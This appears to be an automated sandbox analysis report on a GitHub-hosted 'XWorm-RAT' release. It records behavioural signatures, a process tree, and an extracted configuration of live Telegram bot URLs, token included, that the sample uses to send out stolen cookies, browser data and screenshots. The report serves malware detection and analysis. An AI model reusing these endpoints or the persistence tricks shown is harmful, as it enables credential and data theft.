Analysis
-
max time kernel
295s -
max time network
299s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-10-2024 21:42
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/Intestio/XWorm-RAT/releases/tag/xworm
Resource
win10v2004-20241007-en
General
-
Target
https://github.com/Intestio/XWorm-RAT/releases/tag/xworm
Malware Config
Extracted
gurcu
https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendDocument?chat_id=2024893777&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb)%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%84%20-%20BrowserDownloads.txt%20(0.23%20kb
https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendMessage?chat_id=2024893777
https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/getUpdates?offset=-
https://api.telegram.org/bot6840643388:AAFx-w02hvJE3j8QWzCipTXQ-j2gGH45m_Y/sendDocument?chat_id=2024893777&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Blocklisted process makes network request 7 IoCs
flow pid Process 155 1156 powershell.exe 156 1156 powershell.exe 157 1156 powershell.exe 158 1156 powershell.exe 159 3696 powershell.exe 162 3696 powershell.exe 163 3696 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation Command Reciever.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation Update.exe -
Executes dropped EXE 4 IoCs
pid Process 2436 Command Reciever.exe 3568 Update.exe 5084 XWorm.exe 2308 XWorm.exe -
Loads dropped DLL 3 IoCs
pid Process 2436 Command Reciever.exe 3568 Update.exe 4008 XHVNC.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/memory/4008-329-0x0000000006050000-0x0000000006274000-memory.dmp agile_net -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLogger\\Update.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 98 raw.githubusercontent.com 101 raw.githubusercontent.com 97 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 94 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 3448 tasklist.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 5084 set thread context of 3724 5084 XWorm.exe 168 PID 2308 set thread context of 2044 2308 XWorm.exe 175 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XWorm RAT V2.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Command Reciever.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XWorm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XHVNC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XWorm.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Update.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Command Reciever.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Command Reciever.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2540 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings msedge.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4856 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1524 msedge.exe 1524 msedge.exe 3608 msedge.exe 3608 msedge.exe 2908 identity_helper.exe 2908 identity_helper.exe 4824 msedge.exe 4824 msedge.exe 2436 Command Reciever.exe 2436 Command Reciever.exe 2436 Command Reciever.exe 2436 Command Reciever.exe 2436 Command Reciever.exe 2436 Command Reciever.exe 2436 Command Reciever.exe 2436 Command Reciever.exe 2436 Command Reciever.exe 2436 Command Reciever.exe 2436 Command Reciever.exe 2436 Command Reciever.exe 2436 Command Reciever.exe 2436 Command Reciever.exe 2436 Command Reciever.exe 2436 Command Reciever.exe 2436 Command Reciever.exe 2436 Command Reciever.exe 2436 Command Reciever.exe 2436 Command Reciever.exe 2436 Command Reciever.exe 2436 Command Reciever.exe 3568 Update.exe 3568 Update.exe 3568 Update.exe 3568 Update.exe 3568 Update.exe 3568 Update.exe 3568 Update.exe 3568 Update.exe 3568 Update.exe 3568 Update.exe 3568 Update.exe 3568 Update.exe 3568 Update.exe 3568 Update.exe 3568 Update.exe 3568 Update.exe 3568 Update.exe 3568 Update.exe 3568 Update.exe 3568 Update.exe 3504 Command Reciever.exe 3504 Command Reciever.exe 3504 Command Reciever.exe 3504 Command Reciever.exe 3504 Command Reciever.exe 3504 Command Reciever.exe 3568 Update.exe 3568 Update.exe 3504 Command Reciever.exe 3504 Command Reciever.exe 3504 Command Reciever.exe 3504 Command Reciever.exe 3504 Command Reciever.exe 3504 Command Reciever.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4484 OpenWith.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
pid Process 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 2436 Command Reciever.exe Token: SeDebugPrivilege 3448 tasklist.exe Token: SeDebugPrivilege 3568 Update.exe Token: SeRestorePrivilege 3504 7zG.exe Token: 35 3504 7zG.exe Token: SeSecurityPrivilege 3504 7zG.exe Token: SeSecurityPrivilege 3504 7zG.exe Token: SeDebugPrivilege 1156 powershell.exe Token: SeDebugPrivilege 4804 powershell.exe Token: SeDebugPrivilege 3696 powershell.exe Token: SeDebugPrivilege 2056 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe -
Suspicious use of SendNotifyMessage 26 IoCs
pid Process 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3608 msedge.exe 3504 Command Reciever.exe 3504 Command Reciever.exe -
Suspicious use of SetWindowsHookEx 30 IoCs
pid Process 3568 Update.exe 4008 XHVNC.exe 4008 XHVNC.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe 4484 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3608 wrote to memory of 4628 3608 msedge.exe 84 PID 3608 wrote to memory of 4628 3608 msedge.exe 84 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 3648 3608 msedge.exe 85 PID 3608 wrote to memory of 1524 3608 msedge.exe 86 PID 3608 wrote to memory of 1524 3608 msedge.exe 86 PID 3608 wrote to memory of 1940 3608 msedge.exe 87 PID 3608 wrote to memory of 1940 3608 msedge.exe 87 PID 3608 wrote to memory of 1940 3608 msedge.exe 87 PID 3608 wrote to memory of 1940 3608 msedge.exe 87 PID 3608 wrote to memory of 1940 3608 msedge.exe 87 PID 3608 wrote to memory of 1940 3608 msedge.exe 87 PID 3608 wrote to memory of 1940 3608 msedge.exe 87 PID 3608 wrote to memory of 1940 3608 msedge.exe 87 PID 3608 wrote to memory of 1940 3608 msedge.exe 87 PID 3608 wrote to memory of 1940 3608 msedge.exe 87 PID 3608 wrote to memory of 1940 3608 msedge.exe 87 PID 3608 wrote to memory of 1940 3608 msedge.exe 87 PID 3608 wrote to memory of 1940 3608 msedge.exe 87 PID 3608 wrote to memory of 1940 3608 msedge.exe 87 PID 3608 wrote to memory of 1940 3608 msedge.exe 87 PID 3608 wrote to memory of 1940 3608 msedge.exe 87 PID 3608 wrote to memory of 1940 3608 msedge.exe 87 PID 3608 wrote to memory of 1940 3608 msedge.exe 87 PID 3608 wrote to memory of 1940 3608 msedge.exe 87 PID 3608 wrote to memory of 1940 3608 msedge.exe 87
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Intestio/XWorm-RAT/releases/tag/xworm1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3608 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f7dc46f8,0x7ff9f7dc4708,0x7ff9f7dc47182⤵PID:4628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:22⤵PID:3648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:82⤵PID:1940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:12⤵PID:4288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:12⤵PID:1312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5424 /prefetch:82⤵PID:2044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5424 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:12⤵PID:4544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:12⤵PID:3368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:12⤵PID:664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:12⤵PID:1612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5420 /prefetch:82⤵PID:4460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:12⤵PID:2740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7164 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1256 /prefetch:22⤵PID:3504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4744 /prefetch:12⤵PID:2104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4724 /prefetch:12⤵PID:4548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1076 /prefetch:12⤵PID:4608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:12⤵PID:4456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:12⤵PID:4028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:12⤵PID:1588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4724 /prefetch:12⤵PID:4576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3504 /prefetch:82⤵PID:2660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:12⤵PID:1340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6456 /prefetch:12⤵PID:3068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:12⤵PID:4528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5916 /prefetch:82⤵PID:4448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:12⤵PID:2100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,8900577664840482321,10805858189423739564,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5844 /prefetch:82⤵PID:2800
-
-
